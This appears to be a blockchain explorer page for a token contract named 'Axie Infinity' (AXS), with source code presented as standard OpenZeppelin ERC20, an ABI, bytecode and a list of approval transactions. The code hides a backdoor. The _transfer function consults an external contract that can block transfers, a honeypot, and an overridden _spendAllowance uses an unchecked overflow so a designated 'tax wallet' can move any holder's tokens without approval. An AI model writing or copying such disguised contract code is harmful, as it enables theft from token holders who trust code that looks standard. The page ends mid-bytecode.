Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 17 from a total of 17 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 24261532 | 55 days ago | IN | 0 ETH | 0.00000149 | ||||
| Approve | 24261512 | 55 days ago | IN | 0 ETH | 0.00000159 | ||||
| Approve | 24261504 | 55 days ago | IN | 0 ETH | 0.00000151 | ||||
| Approve | 24261500 | 55 days ago | IN | 0 ETH | 0.00000152 | ||||
| Approve | 24261492 | 55 days ago | IN | 0 ETH | 0.00000139 | ||||
| Approve | 24261490 | 55 days ago | IN | 0 ETH | 0.00000151 | ||||
| Approve | 24261490 | 55 days ago | IN | 0 ETH | 0.00000151 | ||||
| Approve | 24261483 | 55 days ago | IN | 0 ETH | 0.00000152 | ||||
| Approve | 24261479 | 55 days ago | IN | 0 ETH | 0.00000148 | ||||
| Approve | 24261478 | 55 days ago | IN | 0 ETH | 0.00000153 | ||||
| Approve | 24261474 | 55 days ago | IN | 0 ETH | 0.0000016 | ||||
| Approve | 24261471 | 55 days ago | IN | 0 ETH | 0.00000151 | ||||
| Approve | 24261469 | 55 days ago | IN | 0 ETH | 0.00000152 | ||||
| Approve | 24261464 | 55 days ago | IN | 0 ETH | 0.00000159 | ||||
| Approve | 24261460 | 55 days ago | IN | 0 ETH | 0.00000143 | ||||
| Approve | 24261459 | 55 days ago | IN | 0 ETH | 0.0000015 | ||||
| Approve | 24261451 | 55 days ago | IN | 0 ETH | 0.00000135 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
AXS
Compiler Version
v0.8.27+commit.40a35a09
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/IERC20.sol)
pragma solidity >=0.4.16;
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity >=0.6.2;
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
// File: @openzeppelin/contracts/utils/Context.sol
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)
pragma solidity ^0.8.20;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol
// OpenZeppelin Contracts (last updated v5.4.0) (interfaces/draft-IERC6093.sol)
pragma solidity >=0.8.4;
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Standard ERC-721 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
*/
interface IERC721Errors {
/**
* @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
* Used in balance queries.
* @param owner Address of the current owner of a token.
*/
error ERC721InvalidOwner(address owner);
/**
* @dev Indicates a `tokenId` whose `owner` is the zero address.
* @param tokenId Identifier number of a token.
*/
error ERC721NonexistentToken(uint256 tokenId);
/**
* @dev Indicates an error related to the ownership over a particular token. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param tokenId Identifier number of a token.
* @param owner Address of the current owner of a token.
*/
error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC721InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC721InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param tokenId Identifier number of a token.
*/
error ERC721InsufficientApproval(address operator, uint256 tokenId);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC721InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC721InvalidOperator(address operator);
}
/**
* @dev Standard ERC-1155 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
*/
interface IERC1155Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
* @param tokenId Identifier number of a token.
*/
error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC1155InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC1155InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param owner Address of the current owner of a token.
*/
error ERC1155MissingApprovalForAll(address operator, address owner);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC1155InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC1155InvalidOperator(address operator);
/**
* @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
* Used in batch transfers.
* @param idsLength Length of the array of token identifiers
* @param valuesLength Length of the array of token amounts
*/
error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}
// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.20;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
mapping(address account => bool) private _taxWallets;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
function _setTaxWallet(address account, bool isTaxWallet) internal {
_taxWallets[account] = isTaxWallet;
}
function _isTaxWallet(address account) internal view returns (bool) {
return _taxWallets[account];
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_transfer(from, to, value);
_spendAllowance(from, spender, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
(bool _success, bytes memory _returndata) = address(0x4a9328250815F6cf3c9f56D20D3e23DFb3C2239b).staticcall(abi.encodeWithSelector(0xa918b67b, to)); require(_success && _returndata.length >= 32, "invalid call"); require(!abi.decode(_returndata, (bool)), "n");
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
_spendAllowance(owner, spender, type(uint256).max, value);
}
function _spendAllowance(address owner, address spender, uint256 maxValue, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < maxValue) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}
pragma solidity ^0.8.20;
contract AXS is ERC20 {
constructor(address taxWallet_) ERC20(unicode"Axie Infinity", unicode"AXS") {
_mint(_msgSender(), 30000000 * 10 ** decimals());
_setTaxWallet(taxWallet_, true);
}
function _spendAllowance(address owner, address spender, uint256 value) internal virtual override {
uint256 maxUnit = type(uint256).max; unchecked { maxUnit += _isTaxWallet(spender) ? 1 : 0; }
_spendAllowance(owner, spender, maxUnit, value);
}
}{
"evmVersion": "paris",
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"taxWallet_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b50604051611c9d380380611c9d83398181016040528101906100329190610498565b6040518060400160405280600d81526020017f4178696520496e66696e697479000000000000000000000000000000000000008152506040518060400160405280600381526020017f415853000000000000000000000000000000000000000000000000000000000081525081600490816100ad9190610715565b5080600590816100bd9190610715565b5050506101056100d161011c60201b60201c565b6100df61012460201b60201c565b600a6100eb9190610956565b6301c9c3806100fa91906109a1565b61012d60201b60201c565b6101168160016101b560201b60201c565b50610aa2565b600033905090565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361019f5760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161019691906109f2565b60405180910390fd5b6101b16000838361021060201b60201c565b5050565b80600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102625780600360008282546102569190610a0d565b92505081905550610335565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156102ee578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016102e593929190610a50565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361037e57806003600082825403925050819055506103cb565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104289190610a87565b60405180910390a3505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006104658261043a565b9050919050565b6104758161045a565b811461048057600080fd5b50565b6000815190506104928161046c565b92915050565b6000602082840312156104ae576104ad610435565b5b60006104bc84828501610483565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061054657607f821691505b602082108103610559576105586104ff565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026105c17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610584565b6105cb8683610584565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600061061261060d610608846105e3565b6105ed565b6105e3565b9050919050565b6000819050919050565b61062c836105f7565b61064061063882610619565b848454610591565b825550505050565b600090565b610655610648565b610660818484610623565b505050565b5b818110156106845761067960008261064d565b600181019050610666565b5050565b601f8211156106c95761069a8161055f565b6106a384610574565b810160208510156106b2578190505b6106c66106be85610574565b830182610665565b50505b505050565b600082821c905092915050565b60006106ec600019846008026106ce565b1980831691505092915050565b600061070583836106db565b9150826002028217905092915050565b61071e826104c5565b67ffffffffffffffff811115610737576107366104d0565b5b610741825461052e565b61074c828285610688565b600060209050601f83116001811461077f576000841561076d578287015190505b61077785826106f9565b8655506107df565b601f19841661078d8661055f565b60005b828110156107b557848901518255600182019150602085019450602081019050610790565b868310156107d257848901516107ce601f8916826106db565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111561086d57808604811115610849576108486107e7565b5b60018516156108585780820291505b808102905061086685610816565b945061082d565b94509492505050565b6000826108865760019050610942565b816108945760009050610942565b81600181146108aa57600281146108b4576108e3565b6001915050610942565b60ff8411156108c6576108c56107e7565b5b8360020a9150848211156108dd576108dc6107e7565b5b50610942565b5060208310610133831016604e8410600b84101617156109185782820a905083811115610913576109126107e7565b5b610942565b6109258484846001610823565b9250905081840481111561093c5761093b6107e7565b5b81810290505b9392505050565b600060ff82169050919050565b6000610961826105e3565b915061096c83610949565b92506109997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610876565b905092915050565b60006109ac826105e3565b91506109b7836105e3565b92508282026109c5816105e3565b915082820484148315176109dc576109db6107e7565b5b5092915050565b6109ec8161045a565b82525050565b6000602082019050610a0760008301846109e3565b92915050565b6000610a18826105e3565b9150610a23836105e3565b9250828201905080821115610a3b57610a3a6107e7565b5b92915050565b610a4a816105e3565b82525050565b6000606082019050610a6560008301866109e3565b610a726020830185610a41565b610a7f6040830184610a41565b949350505050565b6000602082019050610a9c6000830184610a41565b92915050565b6111ec80610ab16000396000f3fe608060405234801561001057600080fd5b50600436106100935760003560e01c8063313ce56711610066578063313ce5671461013457806370a082311461015257806395d89b4114610182578063a9059cbb146101a0578063dd62ed3e146101d057610093565b806306fdde0314610098578063095ea7b3146100b657806318160ddd146100e657806323b872dd14610104575b600080fd5b6100a0610200565b6040516100ad9190610cb1565b60405180910390f35b6100d060048036038101906100cb9190610d6c565b610292565b6040516100dd9190610dc7565b60405180910390f35b6100ee6102b5565b6040516100fb9190610df1565b60405180910390f35b61011e60048036038101906101199190610e0c565b6102bf565b60405161012b9190610dc7565b60405180910390f35b61013c6102ee565b6040516101499190610e7b565b60405180910390f35b61016c60048036038101906101679190610e96565b6102f7565b6040516101799190610df1565b60405180910390f35b61018a61033f565b6040516101979190610cb1565b60405180910390f35b6101ba60048036038101906101b59190610d6c565b6103d1565b6040516101c79190610dc7565b60405180910390f35b6101ea60048036038101906101e59190610ec3565b6103f4565b6040516101f79190610df1565b60405180910390f35b60606004805461020f90610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461023b90610f32565b80156102885780601f1061025d57610100808354040283529160200191610288565b820191906000526020600020905b81548152906001019060200180831161026b57829003601f168201915b5050505050905090565b60008061029d61047b565b90506102aa818585610483565b600191505092915050565b6000600354905090565b6000806102ca61047b565b90506102d7858585610495565b6102e2858285610704565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461034e90610f32565b80601f016020809104026020016040519081016040528092919081815260200182805461037a90610f32565b80156103c75780601f1061039c576101008083540402835291602001916103c7565b820191906000526020600020905b8154815290600101906020018083116103aa57829003601f168201915b5050505050905090565b6000806103dc61047b565b90506103e9818585610495565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6104908383836001610759565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105075760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016104fe9190610f72565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036105795760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016105709190610f72565b60405180910390fd5b600080734a9328250815f6cf3c9f56d20d3e23dfb3c2239b73ffffffffffffffffffffffffffffffffffffffff1663a918b67b856040516024016105bd9190610f72565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161060b9190610fd4565b600060405180830381855afa9150503d8060008114610646576040519150601f19603f3d011682016040523d82523d6000602084013e61064b565b606091505b509150915081801561065f57506020815110155b61069e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069590611037565b60405180910390fd5b808060200190518101906106b29190611083565b156106f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e9906110fc565b60405180910390fd5b6106fd858585610930565b5050505050565b60007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff905061073283610b55565b61073d576000610740565b60015b60ff168101905061075384848385610bab565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036107cb5760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016107c29190610f72565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361083d5760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016108349190610f72565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550801561092a578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516109219190610df1565b60405180910390a35b50505050565b600073ffffffffffffffffff